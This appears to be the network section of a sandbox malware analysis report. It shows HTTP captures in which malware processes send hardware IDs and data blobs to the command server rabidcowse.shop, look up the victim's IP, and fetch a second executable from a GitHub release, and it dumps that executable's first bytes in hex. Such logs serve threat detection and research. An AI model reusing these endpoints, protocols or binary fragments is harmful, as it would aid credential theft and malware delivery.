                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:25 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=re785gshh91iqtksg2qghjhj0d; expires=Tue, 29 Apr 2025 02:37:04 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Uqbj%2FxuflW06o1rskAmMtR9zz6DjB8NdBHDhD8alN3vvtS3e8UHE2fSWUpoRsQHbn7%2B0J6GyevrdTd1jSew%2FNDCVSi%2BLYV7ZpJNmymsWCgOCnSggJH66CnFeSeMdDUqX8AU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 8fc1bdba99808c7e-EWR
                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1913&min_rtt=1898&rtt_var=743&sent=6&recv=13&lost=0&retrans=0&sent_bytes=2836&recv_bytes=9655&delivery_rate=1442687&cwnd=184&unsent_bytes=0&cid=0fe9713aa65edbd4&ts=482&x=0"
                                                                                                                                                                                                                                                  2025-01-03 08:50:25 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                  2025-01-03 08:50:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  20192.168.2.449955172.67.156.1274437144C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2025-01-03 08:50:26 UTC272OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=508QFQZS5
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Content-Length: 20386
                                                                                                                                                                                                                                                  Host: rabidcowse.shop
                                                                                                                                                                                                                                                  2025-01-03 08:50:26 UTC15331OUTData Raw: 2d 2d 35 30 38 51 46 51 5a 53 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 39 43 38 39 41 45 33 41 37 34 38 45 45 46 31 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 35 30 38 51 46 51 5a 53 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 35 30 38 51 46 51 5a 53 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 37 44 56 78 34 49 2d 2d 69 6e 73 74 61 6c 6c 73 0d 0a 2d 2d 35 30 38 51 46 51 5a 53 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44
                                                                                                                                                                                                                                                  Data Ascii: --508QFQZS5Content-Disposition: form-data; name="hwid"F9C89AE3A748EEF120A4C476FD51BCB1--508QFQZS5Content-Disposition: form-data; name="pid"3--508QFQZS5Content-Disposition: form-data; name="lid"7DVx4I--installs--508QFQZS5Content-D
                                                                                                                                                                                                                                                  2025-01-03 08:50:26 UTC5055OUTData Raw: 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40 f0 eb b1 64 f0 52 3c 78 29
                                                                                                                                                                                                                                                  Data Ascii: lrQMn 64F6(X&7~`aO@dR<x)
                                                                                                                                                                                                                                                  2025-01-03 08:50:27 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:27 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=8up3te76bbk8kkj3m26f001fb7; expires=Tue, 29 Apr 2025 02:37:05 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6mtf1SC32zqJOGYS6ehf7J%2BQmUWB9Qo6ckn0L86i%2FlC%2BrOCAB2whxpH8v0OvZrWNXSw8MSyMyHW4p5IEJs5peOlpF5ELN5IhxkqsOFH8zjEOfqFU1wUT6T%2FZqiqvakubhKs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 8fc1bdc259ef4288-EWR
                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1585&min_rtt=1581&rtt_var=602&sent=10&recv=24&lost=0&retrans=0&sent_bytes=2835&recv_bytes=21338&delivery_rate=1803582&cwnd=245&unsent_bytes=0&cid=b3647b6ac8693e8f&ts=940&x=0"
                                                                                                                                                                                                                                                  2025-01-03 08:50:27 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                  2025-01-03 08:50:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  21192.168.2.44996834.197.122.1724436452C:\Users\user\AppData\Local\Temp\1010458001\liddad.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2025-01-03 08:50:28 UTC52OUTGET /ip HTTP/1.1
                                                                                                                                                                                                                                                  Host: httpbin.org
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  2025-01-03 08:50:28 UTC224INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:28 GMT
                                                                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                                                                  Content-Length: 31
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Server: gunicorn/19.9.0
                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                  2025-01-03 08:50:28 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                                                                                                                                                                                                                  Data Ascii: { "origin": "8.46.123.189"}


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  22192.168.2.449974172.67.156.1274437144C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2025-01-03 08:50:28 UTC273OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=LM2DYCAKVH0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Content-Length: 1229
                                                                                                                                                                                                                                                  Host: rabidcowse.shop
                                                                                                                                                                                                                                                  2025-01-03 08:50:28 UTC1229OUTData Raw: 2d 2d 4c 4d 32 44 59 43 41 4b 56 48 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 39 43 38 39 41 45 33 41 37 34 38 45 45 46 31 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 4c 4d 32 44 59 43 41 4b 56 48 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4c 4d 32 44 59 43 41 4b 56 48 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 37 44 56 78 34 49 2d 2d 69 6e 73 74 61 6c 6c 73 0d 0a 2d 2d 4c 4d 32 44 59 43 41 4b 56 48 30 0d 0a 43
                                                                                                                                                                                                                                                  Data Ascii: --LM2DYCAKVH0Content-Disposition: form-data; name="hwid"F9C89AE3A748EEF120A4C476FD51BCB1--LM2DYCAKVH0Content-Disposition: form-data; name="pid"1--LM2DYCAKVH0Content-Disposition: form-data; name="lid"7DVx4I--installs--LM2DYCAKVH0C
                                                                                                                                                                                                                                                  2025-01-03 08:50:29 UTC1124INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:28 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=od1vk0gmo7nogb1ag2mn1kmnt1; expires=Tue, 29 Apr 2025 02:37:07 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J1TiAik2o5bFraHK9Q9raFXutCtHZY9lrvtoRzuIa0MVExXKVoyESgAlpExa1yqOKiTLP%2F953gDSnjEd4UGgmqM2ycPdZLhXIUtXYWdHaaOWppoz%2BNvfM1FsJ%2BjkroLgvYc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 8fc1bdd0faa28cb4-EWR
                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1913&min_rtt=1907&rtt_var=728&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2835&recv_bytes=2138&delivery_rate=1491317&cwnd=189&unsent_bytes=0&cid=cdc9d3cbee66f69b&ts=438&x=0"
                                                                                                                                                                                                                                                  2025-01-03 08:50:29 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                  2025-01-03 08:50:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  23192.168.2.449976140.82.121.34432800C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2025-01-03 08:50:29 UTC109OUTGET /legendary6911331/zakaz5/releases/download/zakaz5/client_jackbastadguy.exe HTTP/1.1
                                                                                                                                                                                                                                                  Host: github.com
                                                                                                                                                                                                                                                  2025-01-03 08:50:29 UTC971INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                  Server: GitHub.com
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:29 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                  Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                                                                                                                  Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/911427352/1d7d7595-2252-461b-958f-e8d3372f48f6?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250103%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250103T085029Z&X-Amz-Expires=300&X-Amz-Signature=af07bd313c5d406f418a7c1daa9345e61385b33bd2c090d2cc1c6805f8d1a897&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dclient_jackbastadguy.exe&response-content-type=application%2Foctet-stream
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                                                                                                                  X-Frame-Options: deny
                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                  2025-01-03 08:50:29 UTC3383INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                                                                                                                                                                                                                                  Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  24192.168.2.449987185.199.108.1334432800C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2025-01-03 08:50:30 UTC562OUTGET /github-production-release-asset-2e65be/911427352/1d7d7595-2252-461b-958f-e8d3372f48f6?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250103%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250103T085029Z&X-Amz-Expires=300&X-Amz-Signature=af07bd313c5d406f418a7c1daa9345e61385b33bd2c090d2cc1c6805f8d1a897&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dclient_jackbastadguy.exe&response-content-type=application%2Foctet-stream HTTP/1.1
                                                                                                                                                                                                                                                  Host: objects.githubusercontent.com
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  2025-01-03 08:50:30 UTC808INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Content-Length: 14379809
                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                  Last-Modified: Fri, 03 Jan 2025 02:01:11 GMT
                                                                                                                                                                                                                                                  ETag: "0x8DD2B9A7F4FC633"
                                                                                                                                                                                                                                                  Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                  x-ms-request-id: 28b9e009-601e-005e-5583-5d0ab5000000
                                                                                                                                                                                                                                                  x-ms-version: 2024-11-04
                                                                                                                                                                                                                                                  x-ms-creation-time: Fri, 03 Jan 2025 02:01:11 GMT
                                                                                                                                                                                                                                                  x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                  x-ms-lease-state: available
                                                                                                                                                                                                                                                  x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename=client_jackbastadguy.exe
                                                                                                                                                                                                                                                  x-ms-server-encrypted: true
                                                                                                                                                                                                                                                  Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                                                  Fastly-Restarts: 1
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Age: 0
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:30 GMT
                                                                                                                                                                                                                                                  X-Served-By: cache-iad-kcgs7200061-IAD, cache-ewr-kewr1740076-EWR
                                                                                                                                                                                                                                                  X-Cache: HIT, HIT
                                                                                                                                                                                                                                                  X-Cache-Hits: 19, 0
                                                                                                                                                                                                                                                  X-Timer: S1735894230.214212,VS0,VE13
                                                                                                                                                                                                                                                  2025-01-03 08:50:30 UTC1378INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 74 3d 90 33 30 5c fe 60 30 5c fe 60 30 5c fe 60 7b 24 fd 61 37 5c fe 60 7b 24 fb 61 84 5c fe 60 7b 24 fa 61 3a 5c fe 60 20 d8 03 60 33 5c fe 60 20 d8 fd 61 39 5c fe 60 20 d8 fa 61 21 5c fe 60 20 d8 fb 61 18 5c fe 60 7b 24 ff 61 3b 5c fe 60 30 5c ff 60 ab 5c fe 60 7b d9 fa 61 29 5c fe 60 7b d9 fc 61 31 5c fe 60 52 69 63 68 30 5c fe 60 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06
                                                                                                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$t=30\`0\`0\`{$a7\`{$a\`{$a:\` `3\` a9\` a!\` a\`{$a;\`0\`\`{a)\`{a1\`Rich0\`PEd
                                                                                                                                                                                                                                                  2025-01-03 08:50:30 UTC1378INData Raw: d8 48 8b fb 4d 8b cc 41 b8 01 00 00 00 48 0f 47 f8 48 8b cd 48 8b d7 e8 8e f2 00 00 48 83 f8 01 72 69 48 03 ef b8 00 20 00 00 48 2b df 75 cf 8b c6 48 8b 7c 24 70 48 8b 6c 24 60 85 c0 74 0b 49 8b cf e8 f7 3d 01 00 4c 8b fe 49 8b cc e8 08 ef 00 00 49 8b f7 4d 85 ff 74 0e 48 8b d7 49 8b cf e8 19 35 00 00 44 8b e8 48 8b ce e8 ce 3d 01 00 48 8b 5c 24 68 41 8b c5 48 8b 74 24 78 48 83 c4 30 41 5f 41 5e 41 5d 41 5c 5f c3 e8 86 3d 01 00 4d 8d 4e 12 4c 8d 05 4b a6 02 00 48 8d 0d 78 a6 02 00 8b 10 e8 05 17 00 00 41 8b c5 eb 83 48 89 54 24 10 48 89 4c 24 08 53 55 56 57 41 56 41 57 48 81 ec 88 00 00 00 33 c0 4d 8b f0 48 8b da 48 89 44 24 50 48 8b f9 48 89 44 24 58 41 b8 58 00 00 00 48 89 44 24 60 48 8d 15 70 a4 02 00 89 44 24 28 48 8d 4c 24 20 48 89 44 24 20 8b e8 49
                                                                                                                                                                                                                                                  Data Ascii: HMAHGHHHriH H+uH|$pHl$`tI=LIIMtHI5DH=H\$hAHt$xH0A_A^A]A\_=MNLKHxAHT$HL$SUVWAVAWH3MHHD$PHHD$XAXHD$`HpD$(HL$ HD$ I
                                                                                                                                                                                                                                                  2025-01-03 08:50:30 UTC1378INData Raw: 00 49 8b cf e8 77 f0 00 00 85 c0 79 28 e8 a2 38 01 00 4c 8d 4f 12 4c 8d 05 1f a2 02 00 48 8d 0d 54 a2 02 00 8b 10 e8 21 12 00 00 bb ff ff ff ff e9 20 01 00 00 80 7f 10 01 75 18 45 33 c9 4d 8b c4 48 8b d7 49 8b cf e8 00 fb ff ff 8b d8 e9 02 01 00 00 4c 89 6c 24 30 33 db 41 bd 00 20 00 00 4c 89 74 24 28 41 8b cd e8 83 38 01 00 4c 8b f0 48 85 c0 75 28 e8 3a 38 01 00 4c 8d 4f 12 4c 8d 05 bf a0 02 00 48 8d 0d 14 a0 02 00 8b 10 e8 b9 11 00 00 bb ff ff ff ff e9 ae 00 00 00 48 89 74 24 58 8b 77 0c 48 85 f6 0f 84 90 00 00 00 48 89 6c 24 50 66 0f 1f 84 00 00 00 00 00 49 3b f5 48 8b ee 4d 8b cf 41 b8 01 00 00 00 49 0f 47 ed 49 8b ce 48 8b d5 e8 6e ec 00 00 48 83 f8 01 72 36 4d 8b cc 41 b8 01 00 00 00 48 8b d5 49 8b ce e8 94 f3 00 00 48 83 f8 01 72 07 48 2b f5 75 bd
                                                                                                                                                                                                                                                  Data Ascii: Iwy(8LOLHT! uE3MHILl$03A Lt$(A8LHu(:8LOLHHt$XwHHl$PfI;HMAIGIHnHr6MAHIHrH+u
                                                                                                                                                                                                                                                  2025-01-03 08:50:30 UTC1378INData Raw: 48 89 93 20 10 00 00 8b 02 48 03 d0 48 3b 93 10 10 00 00 72 86 48 8b cf e8 79 e4 00 00 48 8b b4 24 a8 00 00 00 48 8b c3 48 8b 8c 24 88 00 00 00 48 33 cc e8 62 a9 00 00 4c 8d 9c 24 90 00 00 00 49 8b 5b 20 49 8b 6b 28 49 8b e3 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 4c 89 44 24 18 4c 89 4c 24 20 53 55 56 57 48 83 ec 38 49 8b f0 48 8d 6c 24 78 48 8b da 48 8b f9 e8 9b f3 ff ff 48 89 6c 24 28 4c 8b ce 4c 8b c3 48 c7 44 24 20 00 00 00 00 48 8b d7 48 8b 08 48 83 c9 02 e8 2c 2d 01 00 85 c0 b9 ff ff ff ff 0f 48 c1 48 83 c4 38 5f 5e 5d 5b c3 cc cc cc cc cc 48 89 5c 24 10 48 89 6c 24 18 48 89 74 24 20 57 48 81 ec 80 02 00 00 48 8b 05 42 c3 03 00 48 33 c4 48 89 84 24 70 02 00 00 48 8b 41 18 4c 8d 05 dc 9d 02 00 4c 8b 49 10 48 8b f9 48 83 c1 28 48 89 44 24 20 ba
                                                                                                                                                                                                                                                  Data Ascii: H HH;rHyH$HH$H3bL$I[ Ik(I_LD$LL$ SUVWH8IHl$xHHHl$(LLHD$ HHH,-HH8_^][H\$Hl$Ht$ WHHBH3H$pHALLIHH(HD$
                                                                                                                                                                                                                                                  2025-01-03 08:50:30 UTC1378INData Raw: 83 ec 50 48 8b 05 ae be 03 00 48 33 c4 48 89 44 24 40 48 8b f1 0f b7 ea 48 8b 89 30 20 00 00 45 0f b7 f0 ff 15 af 92 02 00 48 8b d8 48 85 c0 0f 84 90 00 00 00 0f b7 8e 58 20 00 00 33 ff 0f b7 86 5e 20 00 00 48 89 7c 24 30 89 7c 24 3c 8d 14 49 8b cd 2b ca 48 8b 96 48 20 00 00 2b c8 89 4c 24 38 48 85 d2 74 0c 48 8b cb ff 15 40 8e 02 00 48 8b f8 48 8d 56 28 c7 44 24 20 50 25 00 00 4c 8d 4c 24 30 41 b8 ff ff ff ff 48 8b cb ff 15 4d 92 02 00 48 83 be 48 20 00 00 00 74 0c 48 8b d7 48 8b cb ff 15 07 8e 02 00 48 8b 8e 30 20 00 00 48 8b d3 ff 15 17 92 02 00 0f b7 54 24 3c 66 2b 54 24 34 eb 05 ba 14 00 00 00 0f b7 8e 60 20 00 00 44 0f b7 8e 5e 20 00 00 66 3b d1 0f b7 c1 c7 44 24 28 01 00 00 00 66 0f 43 c2 89 4c 24 20 0f b7 96 58 20 00 00 48 8b 8e 28 20 00 00 44 8b
                                                                                                                                                                                                                                                  Data Ascii: PHH3HD$@HH0 EHHX 3^ H|$0|$<I+HH +L$8HtH@HHV(D$ P%LL$0AHMHH tHHH0 HT$<f+T$4` D^ f;D$(fCL$ X H( D
                                                                                                                                                                                                                                                  2025-01-03 08:50:30 UTC1378INData Raw: 8b d7 48 8b 08 48 83 c9 01 e8 50 25 01 00 85 c0 b9 ff ff ff ff 0f 48 c1 48 83 c4 38 5f 5e 5d 5b c3 cc cc cc cc cc 48 89 4c 24 08 48 89 54 24 10 4c 89 44 24 18 4c 89 4c 24 20 53 55 56 57 41 56 b8 40 10 00 00 e8 8c a1 00 00 48 2b e0 48 8b 05 02 b9 03 00 48 33 c4 48 89 84 24 30 10 00 00 48 8b e9 4c 8d b4 24 78 10 00 00 48 8d 7c 24 30 bb 00 10 00 00 33 f6 e8 0b 2b 01 00 44 8b c8 4c 8d 05 c9 94 02 00 48 8d 05 a2 95 02 00 8b d3 48 8d 4c 24 30 48 89 44 24 20 e8 f9 f4 ff ff 85 c0 78 19 48 63 c8 48 8d 7c 24 30 8b f0 48 03 f9 2b d8 b8 00 00 00 00 0f 49 c3 8b d8 48 63 db e8 94 e8 ff ff 4c 89 74 24 28 4c 8b cd 4c 8b c3 48 c7 44 24 20 00 00 00 00 48 8b d7 48 8b 08 48 83 c9 02 e8 25 22 01 00 4c 8d 0d 4a 95 02 00 c7 44 24 20 10 00 00 00 4c 8d 05 53 95 02 00 8b d6 48 8d
